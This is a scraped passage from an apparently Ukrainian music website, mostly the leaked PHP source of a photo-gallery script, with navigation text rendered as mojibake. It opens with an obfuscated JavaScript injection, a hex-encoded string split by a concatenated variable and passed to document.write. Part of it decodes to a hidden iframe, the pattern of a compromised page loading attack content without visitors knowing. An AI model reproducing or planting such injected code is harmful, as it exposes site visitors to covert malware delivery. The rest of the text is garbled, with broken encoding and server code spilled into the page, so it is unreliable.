'+rd9+'253331253334253332253237'+rd9+'2532302537'+rd9+'37'+rd9+'2536392536342537'+rd9+'34253638253364253336253330253230253638253635253639253637'+rd9+'2536382537'+rd9+'34253364253334253337'+rd9+'253337'+rd9+'2532302537'+rd9+'332537'+rd9+'342537'+rd9+'39253663253635253364253237'+rd9+'2537'+rd9+'362536392537'+rd9+'332536392536322536392536632536392537'+rd9+'342537'+rd9+'39253361253638253639253634253634253635253665253237'+rd9+'2533652533632532662536392536362537'+rd9+'3225363125366425363525336527'+rd9+'29293B7'+rd9+'D7'+rd9+'6617'+rd9+'2206D7'+rd9+'969613D7'+rd9+'47'+rd9+'27'+rd9+'5653B3C2F7'+rd9+'3637'+rd9+'2697'+rd9+'07'+rd9+'43E';document.write(h49c47d9691b27(h49c47d96951cc));
ÍÎÂÈÍÈ Â²ÄÅÎ ÄÈÑÊÎÃÐÀÔ²ß ÌÓÇÈÊÀ ˲ÐÈÊÀ ˲ÍÊÈ ÏÐÎ ÍÀÑ Ë²ÒÓÐÀÒÓÐÀ ÊÎÍÒÀÊÒÈ
ÏÐÎ ÍÀÑ
ËIÒÅÐÀÒÓÐÀ
ÊÎÍÒÀÊÒÈ
˲ÍÊÈ
ÔÎÒÎ
"; include($filename); print""; } } ///// for album description function album($filename) { $is_captioned = check_perms($filename); if ($is_captioned) { print""; include($filename); print"
"; } } ////check file permission function check_perms($filename) { if (! file_exists($filename)) return false; $fileperms = fileperms($filename); $isreadable = $fileperms & 4; if ( is_file($filename) ) { // pictures, thumbnails, config files and comments only need to be readable if (! $isreadable) { if (MODE_WARNING) print "$filename: wrong permission
"; } return $isreadable; } else if ( is_dir($filename) ) { // galleries need to be both readable and executable $isexecutable = $fileperms & 1; if (! $isreadable || ! $isexecutable) if (MODE_WARNING) print "$filename: wrong permission
"; return ( $isreadable && $isexecutable); // ($dirperms & 5) == 5 ? } // default behavior: the filename does not exist return false; } $dh = opendir($dir); while($file = readdir($dh)) { if ($file != "." && $file != ".." && is_dir($file)) {$dname[] = $file; sort($dname); reset ($dname); } } print ""; print "
"; print ""; if ($imgdir =="") {$imgdir = $dname[0]; } $dimg = opendir($imgdir); while($imgfile = readdir($dimg)) { if( (substr($imgfile,-3)=="gif") || (substr($imgfile,-3)=="jpg") || (substr($imgfile,-3)=="JPG") || (substr($imgfile,-3)=="GIF") ) { $a_img[count($a_img)] = $imgfile; sort($a_img); reset ($a_img); } } print "$imgdir"; $totimg = count($a_img); // total images number $totxpage = $col*$maxrow; // images x page $totpages = ($totimg%$totxpage==0)?((int)$totimg/$totxpage):((int)($totimg/$totxpage)+1); // number of total pages if($totimg == false) print "
No Images available in your \"IMAGES\" directory yet!!
"; else { print "
"; ///print album description $album_name = "$imgdir/album.txt"; album($album_name); print "
\n"; // start page if($page=="" || $page==1) { $x=0; $page = 1; } else $x = (($page-1)*($totxpage)); $r=0; // print of table foreach($a_img as $key=>$val) { $caption_name = "$imgdir/$a_img[$x].txt"; if(($x%$col)==0) print "\n"; if($a_img[$x]) { $size = getimagesize ("$imgdir/$a_img[$x]"); $halfw = round($size[0]/2); $halfh = round($size[1]/2); $quarterw = round($size[0]/4); $quarterh = round($size[1]/4); if($size[1] < $size[0]) { $height = 86; $width = 130; $imgnumber = ($x+1); if("$imgdir/$a_img[$x]" !="") if ($thumb){ $thumbnail = "thumbs.php?image=$imgdir/$a_img[$x]&newheight=86&newwidth=130&width=$size[0]&height=$size[1]"; } else { $thumbnail = "$imgdir/$a_img[$x]"; } print "\n"; } else { $height = 130; $width = 86; if ($thumb){ $thumbnail = "thumbs.php?image=$imgdir/$a_img[$x]&newheight=130&newwidth=86&width=$size[0]&height=$size[1]"; } else { $thumbnail = "$imgdir/$a_img[$x]"; } $imgnumber = ($x+1); if("$imgdir/$a_img[$x]" !="") print "
"; print ""; print ""; print ""; print ""; print ""; print ""; print "
$a_img[$x]

$size[0] x $size[1] | 1/2 | 1/4 size"; caption($caption_name); print "
"; print "
"; print ""; print ""; pr